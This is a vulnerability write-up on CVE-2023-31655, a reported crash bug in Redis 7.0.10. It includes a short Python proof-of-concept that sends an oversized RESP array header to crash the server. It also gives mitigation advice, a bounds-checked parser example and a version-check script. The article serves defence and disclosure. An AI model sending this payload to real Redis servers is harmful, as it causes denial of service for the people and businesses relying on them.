In May 2023, a serious vulnerability, CVE-2023-31655, was discovered in Redis 7.0.10. Redis, a popular in-memory database, is often used as a cache, message broker, and general-purpose data store. This vulnerability lets an attacker crash the Redis server remotely, opening the door to denial of service (DoS) attacks. In this article, we’ll break down what the bug is, how it works, walk through a simple proof-of-concept exploit, and point to further reading.

What is CVE-2023-31655?

CVE-2023-31655 is a *segmentation violation flaw* in Redis 7.0.10. If exploited, it causes the Redis server to crash with a segmentation fault. This means a crafted request from an attacker can bring down Redis, leading to a denial of service for anything that relies on that Redis instance.

The bug is triggered when the server receives malformed input that makes it access memory it shouldn't, which results in the classic UNIX segfault.

Affected Version

- Redis 7.0.10 (and possibly earlier minor versions too; the issue was discovered and reported against this version).

Technical Detail

The crash is tied to how Redis parses and manages RESP (Redis Serialization Protocol) data, specifically during the handling of clients’ requests. A certain malformed input bypasses buffer safety checks, eventually causing the Redis process to reference invalid memory and crash.

Proof-of-Concept (PoC) Exploit

Let’s look at a simple Python example that can trigger the segfault in an unpatched Redis 7.0.10 instance.

import socket

def trigger_redis_segv(host="127.0.0.1", port=6379):
    # Connect to the Redis server over a plain TCP socket (no auth, no TLS)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))

    # Malformed RESP request: declare a huge array length and send no elements,
    # so the server's parser acts on a count the client never backs with data.
    payload = (
        b'*999999999\r\n'  # Ridiculously large number of arguments
    )
    s.sendall(payload)
    s.close()

if __name__ == "__main__":
    trigger_redis_segv()
    print("Segmentation fault triggered (if server is vulnerable).")

> WARNING: Do NOT use this exploit on servers you do not own or have explicit permission to test. You should only try this on lab or test Redis servers.

This simply connects to Redis and sends a request that begins with a massive array length but contains no entries, which drives the Redis server’s parser into invalid memory and crashes it.
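To make the "buffer safety checks" from the Technical Detail section concrete, here is an added example (not Redis's own parser or the actual patch) of a minimal RESP multibulk parser with explicit bounds. The limits MAX_ARGS and MAX_BULK are hypothetical values chosen for illustration; the point is that a declared array length is validated before anything is allocated from it, and elements are only accepted as their bytes actually arrive, so the page's `*999999999\r\n` payload is rejected as a protocol error instead of being trusted.

```python
import re

MAX_ARGS = 1024 * 1024        # hypothetical cap on a declared array length
MAX_BULK = 512 * 1024 * 1024  # hypothetical cap on a single bulk string

class ProtocolError(ValueError):
    """Raised for any input the parser refuses to act on."""

def _read_line(buf, pos):
    """Return (line_without_crlf, position_after_crlf) or fail if incomplete."""
    end = buf.find(b"\r\n", pos)
    if end == -1:
        raise ProtocolError("incomplete line")
    return buf[pos:end], end + 2

def _parse_len(raw, limit, what):
    """Turn a RESP length field into an int, enforcing 0 <= n <= limit."""
    if not re.fullmatch(rb"-?\d{1,20}", raw):
        raise ProtocolError(f"malformed {what} length: {raw!r}")
    n = int(raw)
    if n < 0 or n > limit:
        raise ProtocolError(f"{what} length {n} out of bounds (0..{limit})")
    return n

def parse_command(buf):
    """Parse one RESP command (`*N` array of `$len` bulk strings) into a list of bytes."""
    if not buf.startswith(b"*"):
        raise ProtocolError("expected array header")
    line, pos = _read_line(buf, 1)
    argc = _parse_len(line, MAX_ARGS, "array")
    args = []  # grown one element at a time; never preallocated from argc
    for _ in range(argc):
        if buf[pos:pos + 1] != b"$":
            raise ProtocolError("expected bulk string header")
        line, pos = _read_line(buf, pos + 1)
        blen = _parse_len(line, MAX_BULK, "bulk")
        data = buf[pos:pos + blen]
        # The declared length must be backed by real bytes plus a trailing CRLF
        if len(data) != blen or buf[pos + blen:pos + blen + 2] != b"\r\n":
            raise ProtocolError("truncated bulk string")
        args.append(data)
        pos += blen + 2
    return args

def classify(buf):
    """Return ('ok', args) for a well-formed command, ('rejected', reason) otherwise."""
    try:
        return ("ok", parse_command(buf))
    except ProtocolError as exc:
        return ("rejected", str(exc))

if __name__ == "__main__":
    # Constructed inputs: a normal SET command and the article's oversized header
    for sample in (b"*3\r\n$3\r\nSET\r\n$1\r\nk\r\n$1\r\nv\r\n", b"*999999999\r\n"):
        print(sample[:16], "->", classify(sample))
```

The two defensive ideas are the bound check on the declared count and the refusal to reserve memory for elements that have not arrived; either alone would have blunted a header-only request like the one in the PoC.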

Mitigation & Patch

The Redis team patched this in newer versions by checking buffer sizes more carefully and validating input in the RESP parser.

You can check your Redis version using

redis-cli INFO server | grep redis_version

If you see 7.0.10 or below, you should upgrade.
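As an added example (not from the article or the Redis project), the same check can be scripted for a fleet of hosts: fetch `INFO server` over RESP, pull out `redis_version`, and flag anything at or below the article's threshold of 7.0.10. The threshold constant follows the advice above rather than an official fixed-version number, which the article does not state; the sample INFO text is constructed so the parsing functions run offline.

```python
import re
import socket

# The article's advice: 7.0.10 or below should be upgraded (threshold, not a fixed version)
AFFECTED_MAX = (7, 0, 10)

# Constructed sample of `redis-cli INFO server` output, not captured from a real host
SAMPLE_INFO = """# Server
redis_version:7.0.10
redis_git_sha1:00000000
redis_mode:standalone
os:Linux 5.15.0 x86_64
tcp_port:6379
"""

def parse_version(info_text):
    """Extract redis_version from INFO output as an (major, minor, patch) tuple."""
    m = re.search(r"^redis_version:(\d+)\.(\d+)\.(\d+)", info_text, re.MULTILINE)
    if not m:
        raise ValueError("redis_version not found in INFO output")
    return tuple(int(x) for x in m.groups())

def needs_upgrade(info_text, threshold=AFFECTED_MAX):
    """True when the reported version is at or below the threshold."""
    return parse_version(info_text) <= threshold

def fetch_info(host="127.0.0.1", port=6379, timeout=3.0):
    """Send `INFO server` as a RESP command and return the bulk-string reply as text.

    Assumes an unauthenticated, non-TLS instance; add AUTH handling for real deployments.
    """
    request = b"*2\r\n$4\r\nINFO\r\n$6\r\nserver\r\n"
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        data = b""
        # First line is `$<len>\r\n`; keep reading until the declared length has arrived
        while b"\r\n" not in data:
            chunk = s.recv(4096)
            if not chunk:
                raise ConnectionError("connection closed before reply header")
            data += chunk
        header, _, rest = data.partition(b"\r\n")
        if not header.startswith(b"$") or not header[1:].isdigit():
            raise ValueError(f"unexpected reply header: {header!r}")
        length = int(header[1:])
        while len(rest) < length + 2:
            chunk = s.recv(4096)
            if not chunk:
                raise ConnectionError("connection closed mid-reply")
            rest += chunk
    return rest[:length].decode("utf-8", errors="replace")

if __name__ == "__main__":
    print("sample host needs upgrade:", needs_upgrade(SAMPLE_INFO))
    # Live check against a lab instance (uncomment when one is available):
    # print("live host needs upgrade:", needs_upgrade(fetch_info("127.0.0.1")))
```

Comparing version tuples rather than strings avoids the classic "7.0.9" > "7.0.10" mistake that a plain string comparison would make.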

References

- Redis Security Advisory for CVE-2023-31655
- CVSS entry for CVE-2023-31655
- Original Issue Discussion
- Redis Downloads

Conclusion

CVE-2023-31655 is a solid reminder that even mature, popular software like Redis can have dangerous bugs hiding in plain sight. This vulnerability is simple to exploit and very disruptive for business operations that depend on Redis uptime. If you’re running Redis, keep it up to date, don’t expose it to the open internet, and always follow security best practices.

Timeline

Published on: 05/18/2023 20:15:00 UTC
Last modified on: 05/25/2023 18:08:00 UTC